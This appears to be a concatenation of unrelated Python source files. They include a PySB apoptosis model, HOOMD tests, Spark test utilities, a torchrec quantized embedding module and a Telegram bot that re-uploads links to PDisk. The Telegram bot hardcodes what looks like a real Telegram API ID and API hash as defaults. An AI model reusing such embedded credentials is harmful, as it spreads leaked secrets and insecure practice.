Rule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)
Rule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)
Rule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None) | Xiap(Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)
Rule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None) >> Xiap(Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)
Rule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)
Rule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)
Rule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)
Rule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)
Rule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)
Rule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)
Rule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)
Rule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)
Rule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)
Rule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)
Rule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)
Rule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)
Initial(Ligand(Receptor=None), Ligand_0)
Initial(ParpU(C3A=None), ParpU_0)
Initial(C8A(BidU=None), C8A_0)
Initial(BaxM(BidM=None, BaxA=None), BaxM_0)
Initial(Apop(C3pro=None, Xiap=None), Apop_0)
Initial(Fadd(Receptor=None, C8pro=None), Fadd_0)
Initial(ParpC(), ParpC_0)
Initial(Xiap(Apop=None, C3A=None), Xiap_0)
Initial(C9(), C9_0)
Initial(C3ub(), C3ub_0)
Initial(C8pro(Fadd=None), C8pro_0)
Initial(C3pro(Apop=None), C3pro_0)
Initial(CytoCM(BaxA=None), CytoCM_0)
Initial(CytoCC(), CytoCC_0)
Initial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), BaxA_0)
Initial(ApafI(), ApafI_0)
Initial(BidU(C8A=None), BidU_0)
Initial(BidT(), BidT_0)
Initial(C3A(Xiap=None, ParpU=None), C3A_0)
Initial(ApafA(), ApafA_0)
Initial(BidM(BaxM=None), BidM_0)
Initial(Receptor(Ligand=None, Fadd=None), Receptor_0)
|
py | 1a4b86ff2ad93fb2223b3da206787794f9c8a763 | # File name: subtitles.py
import kivy
kivy.require('1.9.0')
from kivy.network.urlrequest import UrlRequest
class Subtitles:
def __init__(self, url):
self.subtitles = []
req = UrlRequest(url, self.got_subtitles)
def got_subtitles(self, req, results):
self.subtitles = results['captions']
def next(self, secs):
for sub in self.subtitles:
ms = secs*1000 - 12000
st = 'startTime'
d = 'duration'
if ms >= sub[st] and ms <= sub[st] + sub[d]:
return sub
return None
|
py | 1a4b87e070af05b355f4ec56836a294cf8470c4b | from os import environ
import os
from urllib.parse import urlparse
import aiohttp
from pyrogram import Client, filters
import requests
from bs4 import BeautifulSoup
import re
API_ID = environ.get('API_ID', '4029928')
API_HASH = environ.get('API_HASH', '99dae01a51f441a77499e01ab08ebdd0')
BOT_TOKEN = environ.get('BOT_TOKEN')
PDISK_API_KEY = environ.get('PDISK_API_KEY')
CHANNEL = environ.get('CHANNEL', 'KayiChat_Official')
bot = Client('pdisk bot',
api_id=API_ID,
api_hash=API_HASH,
bot_token=BOT_TOKEN,
workers=50,
sleep_threshold=0)
@bot.on_message(filters.command('start') & filters.private)
async def start(bot, message):
await message.reply(
f"**Hiya 👋{message.chat.first_name}!**\n\n"
"**A Simple PDisk Uploader Bot.\n\n➠ Send Me Any Direct Link, YouTube Link Or Video Link I Will Upload To PDisk And Give Direct Link\n\nMade With❤BY @BamsiByrek**")
@bot.on_message(filters.text & filters.private)
async def pdisk_uploader(bot, message):
new_string = str(message.text)
try:
pdisk_link = await multi_pdisk_up(new_string)
await message.reply(f'{pdisk_link}', quote=True)
except Exception as e:
await message.reply(f'Error: {e}', quote=True)
@bot.on_message(filters.photo & filters.private)
async def pdisk_uploader(bot, message):
new_string = str(message.caption)
try:
pdisk_link = await multi_pdisk_up(new_string)
if(len(pdisk_link) > 1020):
await message.reply(f'{pdisk_link}', quote=True)
else:
await bot.send_photo(message.chat.id, message.photo.file_id, caption=f'{pdisk_link}')
except Exception as e:
await message.reply(f'Error: {e}', quote=True)
async def get_ptitle(url):
html_text = requests.get(url).text
soup = BeautifulSoup(html_text, 'html.parser')
for title in soup.find_all('title'):
pass
title = list(title.get_text())
title = title[8:]
str = '@' + CHANNEL + ' '
for i in title:
str = str + i
lst = list(html_text.split(","))
c = 0
for i in lst:
if ("""videoid""" in i):
found = lst[c]
break
c += 1
# pdisk.net link
pdisk_video_id = list(found.split(":"))
video_id = pdisk_video_id[2]
video_id = list(video_id.split(","))
v_id = video_id[0]
v_len = len(v_id)
v_id = v_id[1:v_len - 2]
v_url = 'https://www.pdisks.com/share-video?videoid=' + v_id
res = [str, v_url]
return res
async def pdisk_up(link):
if ('pdisk' in link or 'kuklink' in link or 'kofilink' in link or 'cofilink' in link or 'bit' in link):
res = await get_ptitle(link)
title_pdisk = res[0]
link = res[1]
else:
title_new = urlparse(link)
title_new = os.path.basename(title_new.path)
title_pdisk = '@' + CHANNEL + title_new
res = requests.get(
'http://linkapi.net/open/create_item?link_type=link&content_src=' + link + '&source=2000&api_key=' + PDISK_API_KEY + '&dir_id=0&title=' + title_pdisk + '&description=Join_' + CHANNEL + '_for_more_like_this')
data = res.json()
data = dict(data)
print(data)
v_id = data['data']['item_id']
v_url = 'https://www.pdisks.com/share-video?videoid=' + v_id
return (v_url)
async def multi_pdisk_up(ml_string):
new_ml_string = list(map(str, ml_string.split(" ")))
new_ml_string = await remove_username(new_ml_string)
new_join_str = "".join(new_ml_string)
urls = re.findall(r'(https?://[^\s]+)', new_join_str)
nml_len = len(new_ml_string)
u_len = len(urls)
url_index = []
count = 0
for i in range(nml_len):
for j in range(u_len):
if (urls[j] in new_ml_string[i]):
url_index.append(count)
count += 1
new_urls = await new_pdisk_url(urls)
url_index = list(dict.fromkeys(url_index))
i = 0
for j in url_index:
new_ml_string[j] = new_ml_string[j].replace(urls[i], new_urls[i])
i += 1
new_string = " ".join(new_ml_string)
return await addFooter(new_string)
async def new_pdisk_url(urls):
new_urls = []
for i in urls:
new_urls.append(await pdisk_up(i))
return new_urls
async def remove_username(new_List):
for i in new_List:
if('@' in i or 't.me' in i or 'https://bit.ly/3m4gabB' in i or 'https://bit.ly/pdisk_tuts' in i or 'telegra.ph' in i):
new_List.remove(i)
return new_List
async def addFooter(str):
footer = """
━━━━━━━━━━━━━━━
⦿ Made With♥️BY @bamsibyrek
━━━━━━━━━━━━━━━
✪ »JOIN CHANNEL ➡️ t.me/""" + CHANNEL
return str + footer
bot.run()
|
py | 1a4b88a9c835181f5ac1948ce25ac2862dfb9183 | class PlanNode:
def __init__(self, numNo, strSerialNumber, strModel, numModelNumber,
dateStart, numAssemblyOrder, dateEnd, strOrderOrigin):
self.numNo = numNo
self.strSerialNumber = strSerialNumber
self.strModel = strModel
self.numModelNumber = numModelNumber
self.dateStart = dateStart
self.numAssemblyOrder = numAssemblyOrder
self.dateEnd = dateEnd
self.strOrderOrigin = strOrderOrigin
def printOut(self):
print('No :', self.numNo, ', SerialNum : ', self.strSerialNumber,
',Model:', self.strModel, ',Start Date:',
self.dateStart)
def getNextNode(self):
# Problem 1. complete this method
node = self.nextNode
return node
def getPrevNode(self):
# Problem 1. complete this method
node = self.prevNode
return node
def setNextNode(self, node):
# Problem 1. complete this method
self.nextNode = node
def setPrevNode(self, node):
# Problem 1. complete this method
self.prevNode = node |
py | 1a4b89f66a1d83f756c086f0f00a19ebba0c1a5f | import hoomd
from hoomd import mcm
import unittest
hoomd.context.initialize()
print(hoomd.__file__)
class test_type_shapes(unittest.TestCase):
def setUp(self):
hoomd.context.initialize()
def test_type_shapes_convex_polygon(self):
box = hoomd.data.boxdim(10, dimensions=2)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.convex_polygon(seed=10);
test_verts = [(1, 0), (0, 1), (-1, -1)]
self.mc.shape_param.set('A', vertices=test_verts)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'Polygon')
self.assertEqual(len(shape_types[0]['vertices']), 3)
self.assertTrue(all([shape_types[0]['vertices'][i] == list(test_verts[i]) for i in range(len(test_verts))]))
def test_type_shapes_simple_polygon(self):
box = hoomd.data.boxdim(10, dimensions=2)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.simple_polygon(seed=10);
test_verts = [(1, 0), (0, 1), (-1, -1)]
self.mc.shape_param.set('A', vertices=test_verts)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'Polygon')
self.assertEqual(len(shape_types[0]['vertices']), 3)
self.assertTrue(all([shape_types[0]['vertices'][i] == list(test_verts[i]) for i in range(len(test_verts))]))
def test_type_shapes_disks(self):
box = hoomd.data.boxdim(10, dimensions=2)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.sphere(seed=10);
test_diam = 1
self.mc.shape_param.set('A', diameter = test_diam)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'Disk')
self.assertEqual(shape_types[0]['diameter'], test_diam)
self.assertNotIn('vertices', shape_types[0])
def test_type_shapes_spheres(self):
box = hoomd.data.boxdim(10, dimensions=3)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.sphere(seed=10);
test_diam = 1
self.mc.shape_param.set('A', diameter = test_diam)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'Sphere')
self.assertEqual(shape_types[0]['diameter'], test_diam)
self.assertNotIn('vertices', shape_types[0])
def test_type_shapes_convex_polyhedron(self):
box = hoomd.data.boxdim(10, dimensions=2)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.convex_polyhedron(seed=10);
test_verts = [(1, 0, 0), (0, 1, 0), (-1, -1, 0)]
self.mc.shape_param.set('A', vertices=test_verts)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'ConvexPolyhedron')
self.assertEqual(len(shape_types[0]['vertices']), 3)
self.assertTrue(all([shape_types[0]['vertices'][i] == list(test_verts[i]) for i in range(len(test_verts))]))
def tearDown(self):
del self.mc
del self.system
hoomd.context.initialize()
|
py | 1a4b8a7ba29ee4bcd8376b2cae5459491ac19644 | # Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from conftest import is_allowing_any_non_gpu, get_non_gpu_allowed
from pyspark.sql import SparkSession, DataFrame
from spark_init_internal import get_spark_i_know_what_i_am_doing
def _from_scala_map(scala_map):
ret = {}
# The value we get is a scala map, not a java map, so we need to jump through some hoops
keys = scala_map.keys().iterator()
while keys.hasNext():
key = keys.next()
ret[key] = scala_map.get(key).get()
return ret
_spark = get_spark_i_know_what_i_am_doing()
# Have to reach into a private member to get access to the API we need
_orig_conf = _from_scala_map(_spark.conf._jconf.getAll())
_orig_conf_keys = _orig_conf.keys()
def is_tz_utc(spark=_spark):
"""
true if the tz is UTC else false
"""
# Now we have to do some kind of ugly internal java stuff
jvm = spark.sparkContext._jvm
utc = jvm.java.time.ZoneId.of('UTC').normalized()
sys_tz = jvm.java.time.ZoneId.systemDefault().normalized()
return utc == sys_tz
def _set_all_confs(conf):
for key, value in conf.items():
if _spark.conf.get(key, None) != value:
_spark.conf.set(key, value)
def reset_spark_session_conf():
"""Reset all of the configs for a given spark session."""
_set_all_confs(_orig_conf)
#We should clear the cache
_spark.catalog.clearCache()
# Have to reach into a private member to get access to the API we need
current_keys = _from_scala_map(_spark.conf._jconf.getAll()).keys()
for key in current_keys:
if key not in _orig_conf_keys:
_spark.conf.unset(key)
def _check_for_proper_return_values(something):
"""We don't want to return an DataFrame or Dataset from a with_spark_session. You will not get what you expect"""
if (isinstance(something, DataFrame)):
raise RuntimeError("You should never return a DataFrame from a with_*_session, you will not get the results that you expect")
def with_spark_session(func, conf={}):
"""Run func that takes a spark session as input with the given configs set."""
reset_spark_session_conf()
_set_all_confs(conf)
ret = func(_spark)
_check_for_proper_return_values(ret)
return ret
def with_cpu_session(func, conf={}):
"""Run func that takes a spark session as input with the given configs set on the CPU."""
copy = dict(conf)
copy['spark.rapids.sql.enabled'] = 'false'
return with_spark_session(func, conf=copy)
def with_gpu_session(func, conf={}):
"""
Run func that takes a spark session as input with the given configs set on the GPU.
Note that this forces you into test mode unless. It is not a requirement, but is
simplest for right now.
"""
copy = dict(conf)
copy['spark.rapids.sql.enabled'] = 'true'
if is_allowing_any_non_gpu():
copy['spark.rapids.sql.test.enabled'] = 'false'
else:
copy['spark.rapids.sql.test.enabled'] = 'true'
copy['spark.rapids.sql.test.allowedNonGpu'] = ','.join(get_non_gpu_allowed())
return with_spark_session(func, conf=copy)
|
py | 1a4b8a80ed25ac95d86dd2896add2627f55057ce | # -*- coding: utf-8 -*-
"""
***************************************************************************
EditModelAction.py
---------------------
Date : February 2019
Copyright : (C) 2019 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'February 2019'
__copyright__ = '(C) 2019, Nyall Dawson'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
from qgis.PyQt.QtCore import QCoreApplication
from qgis.core import QgsProcessingModelAlgorithm, QgsProcessing, QgsApplication
from processing.gui.ContextAction import ContextAction
from processing.script.ScriptEditorDialog import ScriptEditorDialog
class ExportModelAsPythonScriptAction(ContextAction):
def __init__(self):
super().__init__()
self.name = QCoreApplication.translate('ExportModelAsPythonScriptAction', 'Export Model as Python Algorithm…')
def isEnabled(self):
return isinstance(self.itemData, QgsProcessingModelAlgorithm)
def icon(self):
return QgsApplication.getThemeIcon('/mActionSaveAsPython.svg')
def execute(self):
alg = self.itemData
dlg = ScriptEditorDialog(None)
dlg.editor.setText('\n'.join(alg.asPythonCode(QgsProcessing.PythonQgsProcessingAlgorithmSubclass, 4)))
dlg.show()
|
py | 1a4b8c1ae75cb0bf9723d65908008de0947cc46b | #!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import copy
from collections import OrderedDict
from typing import Dict, Any, Optional, List, Iterator, Tuple
import torch
import torch.nn as nn
from fbgemm_gpu.split_table_batched_embeddings_ops import (
IntNBitTableBatchedEmbeddingBagsCodegen,
EmbeddingLocation,
)
from torch import Tensor
from torchrec.modules.embedding_configs import (
EmbeddingBagConfig,
DataType,
DATA_TYPE_NUM_BITS,
data_type_to_sparse_type,
dtype_to_data_type,
pooling_type_to_pooling_mode,
)
from torchrec.modules.embedding_modules import (
EmbeddingBagCollection as OriginalEmbeddingBagCollection,
ebc_get_embedding_names,
)
from torchrec.modules.embedding_modules import EmbeddingBagCollectionInterface
from torchrec.sparse.jagged_tensor import (
KeyedJaggedTensor,
KeyedTensor,
)
try:
torch.ops.load_library("//deeplearning/fbgemm/fbgemm_gpu:sparse_ops")
except OSError:
pass
# OSS
try:
import fbgemm_gpu # @manual # noqa
except ImportError:
pass
def quantize_state_dict(
module: nn.Module,
table_name_to_quantized_weights: Dict[str, Tuple[Tensor, Tensor]],
data_type: DataType,
) -> torch.device:
device = torch.device("cpu")
for key, tensor in module.state_dict().items():
# Extract table name from state dict key.
# e.g. ebc.embedding_bags.t1.weight
splits = key.split(".")
assert splits[-1] == "weight"
table_name = splits[-2]
device = tensor.device
num_bits = DATA_TYPE_NUM_BITS[data_type]
if tensor.is_meta:
quant_weight = torch.empty(
(tensor.shape[0], (tensor.shape[1] * num_bits) // 8),
device="meta",
# pyre-fixme[16]: Item `Tensor` of `Union[Tensor, Module]` has
# no attribute `weight`.
dtype=module.qconfig.weight().dtype,
)
scale_shift = torch.empty(
(tensor.shape[0], 4),
device="meta",
# pyre-fixme[16]: Item `Tensor` of `Union[Tensor, Module]` has
# no attribute `weight`.
dtype=module.qconfig.weight().dtype,
)
else:
quant_res = torch.ops.fbgemm.FloatToFusedNBitRowwiseQuantizedSBHalf(
tensor, num_bits
)
quant_weight, scale_shift = (
quant_res[:, :-4],
quant_res[:, -4:],
)
table_name_to_quantized_weights[table_name] = (quant_weight, scale_shift)
return device
class EmbeddingBagCollection(EmbeddingBagCollectionInterface):
"""
EmbeddingBagCollection represents a collection of pooled embeddings (EmbeddingBags).
This EmbeddingBagCollection is quantized for lower precision. It relies on fbgemm quantized ops
It processes sparse data in the form of KeyedJaggedTensor
with values of the form [F X B X L]
F: features (keys)
B: batch size
L: Length of sparse features (jagged)
and outputs a KeyedTensor with values of the form [B * (F * D)]
where
F: features (keys)
D: each feature's (key's) embedding dimension
B: batch size
Constructor Args:
table_name_to_quantized_weights (Dict[str, Tuple[Tensor, Tensor]]): map of tables to quantized weights
embedding_configs (List[EmbeddingBagConfig]): list of embedding tables
is_weighted: (bool): whether input KeyedJaggedTensor is weighted
device: (Optional[torch.device]): default compute device
Call Args:
features: KeyedJaggedTensor,
Returns:
KeyedTensor
Example::
table_0 = EmbeddingBagConfig(
name="t1", embedding_dim=3, num_embeddings=10, feature_names=["f1"]
)
table_1 = EmbeddingBagConfig(
name="t2", embedding_dim=4, num_embeddings=10, feature_names=["f2"]
)
ebc = EmbeddingBagCollection(tables=[eb1_config, eb2_config])
# 0 1 2 <-- batch
# "f1" [0,1] None [2]
# "f2" [3] [4] [5,6,7]
# ^
# feature
features = KeyedJaggedTensor(
keys=["f1", "f2"],
values=torch.tensor([0, 1, 2, 3, 4, 5, 6, 7]),
offsets=torch.tensor([0, 2, 2, 3, 4, 5, 8]),
)
ebc.qconfig = torch.quantization.QConfig(
activation=torch.quantization.PlaceholderObserver.with_args(
dtype=torch.qint8
),
weight=torch.quantization.PlaceholderObserver.with_args(dtype=torch.qint8),
)
qebc = QuantEmbeddingBagCollection.from_float(ebc)
quantized_embeddings = qebc(features)
"""
def __init__(
self,
table_name_to_quantized_weights: Dict[str, Tuple[Tensor, Tensor]],
embedding_configs: List[EmbeddingBagConfig],
is_weighted: bool,
device: torch.device,
) -> None:
super().__init__()
self._is_weighted = is_weighted
self._embedding_bag_configs: List[EmbeddingBagConfig] = embedding_configs
self.embedding_bags: nn.ModuleList = nn.ModuleList()
self._lengths_per_embedding: List[int] = []
table_names = set()
for emb_config in self._embedding_bag_configs:
if emb_config.name in table_names:
raise ValueError(f"Duplicate table name {emb_config.name}")
table_names.add(emb_config.name)
emb_module = IntNBitTableBatchedEmbeddingBagsCodegen(
embedding_specs=[
(
"",
emb_config.num_embeddings,
emb_config.embedding_dim,
data_type_to_sparse_type(emb_config.data_type),
EmbeddingLocation.HOST
if device.type == "cpu"
else EmbeddingLocation.DEVICE,
)
],
pooling_mode=pooling_type_to_pooling_mode(emb_config.pooling),
weight_lists=[table_name_to_quantized_weights[emb_config.name]],
device=device,
)
self.embedding_bags.append(emb_module)
if not emb_config.feature_names:
emb_config.feature_names = [emb_config.name]
self._lengths_per_embedding.extend(
len(emb_config.feature_names) * [emb_config.embedding_dim]
)
self._embedding_names: List[str] = ebc_get_embedding_names(embedding_configs)
def forward(
self,
features: KeyedJaggedTensor,
) -> KeyedTensor:
pooled_embeddings: List[Tensor] = []
length_per_key: List[int] = []
feature_dict = features.to_dict()
for emb_config, emb_module in zip(
self._embedding_bag_configs, self.embedding_bags
):
for feature_name in emb_config.feature_names:
f = feature_dict[feature_name]
values = f.values()
offsets = f.offsets()
pooled_embeddings.append(
emb_module(
indices=values.int(),
offsets=offsets.int(),
per_sample_weights=f.weights() if self._is_weighted else None,
).float()
)
length_per_key.append(emb_config.embedding_dim)
return KeyedTensor(
keys=self._embedding_names,
values=torch.cat(pooled_embeddings, dim=1),
length_per_key=self._lengths_per_embedding,
)
# pyre-fixme[14]: `state_dict` overrides method defined in `Module` inconsistently.
def state_dict(
self,
destination: Optional[Dict[str, Any]] = None,
prefix: str = "",
keep_vars: bool = False,
) -> Dict[str, Any]:
if destination is None:
destination = OrderedDict()
# pyre-ignore [16]
destination._metadata = OrderedDict()
for emb_config, emb_module in zip(
self._embedding_bag_configs,
self.embedding_bags,
):
(weight, _) = emb_module.split_embedding_weights(split_scale_shifts=False)[
0
]
destination[prefix + f"embedding_bags.{emb_config.name}.weight"] = weight
return destination
def named_buffers(
self, prefix: str = "", recurse: bool = True
) -> Iterator[Tuple[str, nn.Parameter]]:
state_dict = self.state_dict(prefix=prefix, keep_vars=True)
for key, value in state_dict.items():
yield key, value
def _get_name(self) -> str:
return "QuantizedEmbeddingBagCollection"
@classmethod
def from_float(
cls, module: OriginalEmbeddingBagCollection
) -> "EmbeddingBagCollection":
assert hasattr(
module, "qconfig"
), "EmbeddingBagCollection input float module must have qconfig defined"
# pyre-ignore [16]
data_type = dtype_to_data_type(module.qconfig.weight().dtype)
embedding_bag_configs = copy.deepcopy(module.embedding_bag_configs)
for config in embedding_bag_configs:
config.data_type = data_type
table_name_to_quantized_weights: Dict[str, Tuple[Tensor, Tensor]] = {}
device = quantize_state_dict(module, table_name_to_quantized_weights, data_type)
return cls(
table_name_to_quantized_weights,
embedding_bag_configs,
module.is_weighted,
device=device,
)
@property
def embedding_bag_configs(
self,
) -> List[EmbeddingBagConfig]:
return self._embedding_bag_configs
@property
def is_weighted(self) -> bool:
return self._is_weighted
|
py | 1a4b8c9b5179e3a976a417c6a77ba392025b46d9 | # import easydict
from multiprocessing import Process
import yaml
from pathlib import Path
import argparse
import torch
import tqdm
import numpy as np
import copy
# torch
import torchvision
from torchvision.models.detection import FasterRCNN
from torchvision.models.detection.rpn import AnchorGenerator
from torchvision.models import mobilenet_v2
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision import transforms
# from yolov5.train_dt import yolov5
from EfficientObjectDetection.train_new_reward import EfficientOD
# import fr_utils
import munch
import os
import utils
from utils import load_filenames, load_dataset, load_dataloader, compute_map, convert_yolo2coco, label2idx, label_matching, reduce_dict, make_results
opt = {'epochs':100,
'batch_size':12,
'device':1,
'test_epoch':10,
'eval_epoch':2,
'step_batch_size':100,
'save_path':'save',
'save_freq': 5,
'rl_weight':None,
'print_freq': 50,
'h_detector_weight':'',
'l_detector_weight':'',
'fine_tr':'config/fine_tr.yaml',
'fine_eval':'config/fine_eval.yaml',
'coarse_tr':'config/coarse_tr.yaml',
'coarse_eval':'config/coarse_eval.yaml',
'EfficientOD':'config/EfficientOD.yaml',
'split': 4}
opt = munch.AutoMunch(opt)
# GPU Device
gpu_id = opt.device
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)
use_cuda = torch.cuda.is_available()
print("GPU device " , use_cuda)
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
# training option load from yaml files
with open(opt.fine_tr) as f:
fine_tr = yaml.load(f, Loader=yaml.FullLoader)
